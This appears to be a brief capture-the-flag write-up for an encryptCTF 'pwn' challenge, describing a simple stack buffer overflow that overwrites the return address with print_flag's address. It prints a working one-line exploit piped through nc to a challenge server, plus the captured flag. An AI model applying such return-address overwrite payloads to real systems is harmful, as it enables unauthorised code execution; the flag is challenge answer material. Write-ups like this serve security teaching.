Tags: pwn 

Rating: 0

Simple buffer overflow we get the address for print_flag from using objdump, the address is passed at the seg fault and is reversed for the exploit.

`Address of print_flag: 0x080484dd`

Exploit:
`python -c "print 'A'*80 + '\xdd\x84\x04\x08'" | nc 104.154.106.182 1234`

How's the josh?
Your josh is low!
Bye!

`Flag: encryptCTF{L3t5_R4!53_7h3_J05H}`